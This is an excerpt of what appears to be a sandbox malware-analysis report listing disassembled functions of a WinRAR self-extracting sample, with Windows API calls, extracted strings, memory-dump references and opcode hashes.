                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                        • String ID: 7$0
                                                                                        • API String ID: 2622349952-1435763450
                                                                                        • Opcode ID: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
                                                                                        • Instruction ID: b703684590a50d98e9b605fccc6cfec653ba1334f19fdffbc5de775c02dbc63e
                                                                                        • Opcode Fuzzy Hash: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
                                                                                        • Instruction Fuzzy Hash: 70F0AF38104288AADF572F608C0DBEA3B6DAF05344F0DC514FC4794AA9CBB4C994EB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00389A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1036877536-0
                                                                                        • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                        • Instruction ID: afea6cf21dd785ae498077b268636685315f7e200bc5196617184100474856bd
                                                                                        • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                        • Instruction Fuzzy Hash: 33A12672A043869FDB27AF68C8817BEBBE5EF55310F2D45EAE4859B281C2398941C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00367F69,?,?,?), ref: 0036A3FA
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00367F69,?), ref: 0036A43E
                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00367F69,?,?,?,?,?,?,?), ref: 0036A4BF
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00367F69,?,?,?,?,?,?,?,?,?,?), ref: 0036A4C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 2287278272-0
                                                                                        • Opcode ID: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
                                                                                        • Instruction ID: 4da685a10fc9ce6a62dee5796f2c50f789b44c1fad885e0a505a3bfbc66b2e88
                                                                                        • Opcode Fuzzy Hash: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
                                                                                        • Instruction Fuzzy Hash: 5041E1311487819AE733DF24DC45F9EBBE8AB80700F148919B5E1A7284DAA49A489F53
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,003847C6,00000000,00000000,003857FB,?,003857FB,?,00000001,003847C6,2DE85006,00000001,003857FB,003857FB), ref: 0038C9D5
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038CA5E
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0038CA70
                                                                                        • __freea.LIBCMT ref: 0038CA79
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 2652629310-0
                                                                                        • Opcode ID: 759f84f03367f2bfe00cc17c8d1c485900fbb328f0865dda1d0c9bdb2ad7b666
                                                                                        • Instruction ID: 9cbad64e0948b8b8f18a8cd185a7ec2e514e46a91264e4a5712d19df123d5084
                                                                                        • Opcode Fuzzy Hash: 759f84f03367f2bfe00cc17c8d1c485900fbb328f0865dda1d0c9bdb2ad7b666
                                                                                        • Instruction Fuzzy Hash: 18318072A1021AABDF2AEF74DC45DAE7BA5EB41310F1541A9FC04EA250E739DD50CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0037A666
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037A675
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A683
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0037A691
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
                                                                                        • Instruction ID: fd397b00933a07a31c12c01f60d7713a8bc596976ea81e9502e8557560fc7849
                                                                                        • Opcode Fuzzy Hash: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
                                                                                        • Instruction Fuzzy Hash: 8BE0EC33942B31A7D2636B61AC0DF8A3E5CEB0AB52F418101FA06D6190DB6496008BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: .lnk$d7
                                                                                        • API String ID: 2691759472-501123111
                                                                                        • Opcode ID: d4b6c72ba0f8eb87775ad498e1ff41bed82a4a3b6637e078e5582ff3e938f03c
                                                                                        • Instruction ID: 9d631afb3241bcaa25d0fb0a15328017d4a29417a695da9ecbf94eed46b42f26
                                                                                        • Opcode Fuzzy Hash: d4b6c72ba0f8eb87775ad498e1ff41bed82a4a3b6637e078e5582ff3e938f03c
                                                                                        • Instruction Fuzzy Hash: 0CA13F7290012996DF36DBA0CD45EFA73FCAF44304F08C5A6E50DE7141EE789A858F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003675DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003675E3
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036777F
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                        • String ID: :
                                                                                        • API String ID: 3226429890-336475711
                                                                                        • Opcode ID: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                        • Instruction ID: af77dee9b06b85dac19ec659d013d6712748f5d12c9cc128dc8f72dfdb494042
                                                                                        • Opcode Fuzzy Hash: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                        • Instruction Fuzzy Hash: BF417071800258A9EB36EB64CC55EEEB37CAF45300F40C096B60AAB196DB745F84CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: *
                                                                                        • API String ID: 2691759472-163128923
                                                                                        • Opcode ID: 9669e8336c5fac09ad68324c46476e9579d21f5b1648ba97caa97e99b34c62ef
                                                                                        • Instruction ID: 32f21c07aa1e3d7bfe33f20ce7763ba7297c14eafeb5ab0b3d0166369af801b1
                                                                                        • Opcode Fuzzy Hash: 9669e8336c5fac09ad68324c46476e9579d21f5b1648ba97caa97e99b34c62ef
                                                                                        • Instruction Fuzzy Hash: 68310B362443019ACA33AE568902677F3E8DF91B50F16C41DF988D714BEF668DC29B61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: }
                                                                                        • API String ID: 176396367-4239843852
                                                                                        • Opcode ID: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                        • Instruction ID: c8ba408154312c8094c68807685e20ad0a75dfb22302ca6dfff685e77ea517e9
                                                                                        • Opcode Fuzzy Hash: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                        • Instruction Fuzzy Hash: FA21D47290430A5AD733EA64D845F6BF3ECDF82764F11442AF548C7141E778E94883A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                          • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,0036F33E), ref: 0036F3D2
                                                                                        Strings
                                                                                        • CryptUnprotectMemory failed, xrefs: 0036F3CA
                                                                                        • CryptProtectMemory failed, xrefs: 0036F389
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                        • API String ID: 2190909847-396321323
                                                                                        • Opcode ID: 53f216b874925af24af78f3cfab54cdc0a5c041976ce607a59cb2c294dacb04f
                                                                                        • Instruction ID: 0c164936150de98bf4dd0e09e7e5cd272ecb00d44e67134e0ad36fdcbf56e868
                                                                                        • Opcode Fuzzy Hash: 53f216b874925af24af78f3cfab54cdc0a5c041976ce607a59cb2c294dacb04f
                                                                                        • Instruction Fuzzy Hash: E5112635A01629AFDF139F24EC46A6E3758FF01760F21C126FC416F359DA749D018790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr
                                                                                        • String ID: <99$?*<>|"
                                                                                        • API String ID: 2691759472-236475344
                                                                                        • Opcode ID: 091a04f52ffc0af520d71769fea88d88a79c978119df15c21b3913cf66279e5a
                                                                                        • Instruction ID: 2ee43fba1507d3ad25a6d780a1e9cdad5c42f0e3acbba9ac75588cbdd91e5529
                                                                                        • Opcode Fuzzy Hash: 091a04f52ffc0af520d71769fea88d88a79c978119df15c21b3913cf66279e5a
                                                                                        • Instruction Fuzzy Hash: C0F0A457A69741C5C7322F299801732F3E8EF95734F36A81EE5C5872C6E6A2C8C08665
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: Software\WinRAR SFX$7
                                                                                        • API String ID: 176396367-33624352
                                                                                        • Opcode ID: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                        • Instruction ID: 4edb5e6122842190707c9f1d0d8707a3f723702f4868c434b93280547c3c609a
                                                                                        • Opcode Fuzzy Hash: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                        • Instruction Fuzzy Hash: B0018432500128BAEF339B51DC09FDF7F7CEF09751F008051B50AA5060D7B45A88C7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FE5
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FF6
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372006
                                                                                          • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00372014
                                                                                          • Part of subcall function 00371FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                          • Part of subcall function 0037AC04: SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                        • _wcslen.LIBCMT ref: 0037AE8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                        • String ID: <7$C:\Users\user\Desktop
                                                                                        • API String ID: 521417927-3960524650
                                                                                        • Opcode ID: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                        • Instruction ID: 046537c110f44156d380ccd3cce8e4bcfa0ab97fb62549820d72bfa00a3f5065
                                                                                        • Opcode Fuzzy Hash: 314fe9394fb4a069537da710946ad18906f96c2d5e2db2fc6e110f3d1e847c5c
                                                                                        • Instruction Fuzzy Hash: 1E015271D00219A5DF23ABA4DD0AEDE72FCAF0D700F004456F609E7191E6B896448BA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1098,00384674,003A1098,?,?,003840EF,?,?,003A1098), ref: 003897E9
                                                                                          • Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
                                                                                          • Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1098), ref: 0038985D
                                                                                          • Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863
                                                                                        • _abort.LIBCMT ref: 0038BB80
                                                                                        • _free.LIBCMT ref: 0038BBB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_abort_free
                                                                                        • String ID: p9
                                                                                        • API String ID: 289325740-1904256876
                                                                                        • Opcode ID: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                        • Instruction ID: 8af0abf776e1d9bcefee598523577d213c433a441a7aa2b484288e20b6476298
                                                                                        • Opcode Fuzzy Hash: e6f9a7039994d61314dabde3296f8e42647ef126814fc1634bb19c96b9ac2ebf
                                                                                        • Instruction Fuzzy Hash: 4C018071D01B22DBCB23FF69840162DF7A5BF04B20B1A019AE8646B295CB756D018FC1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
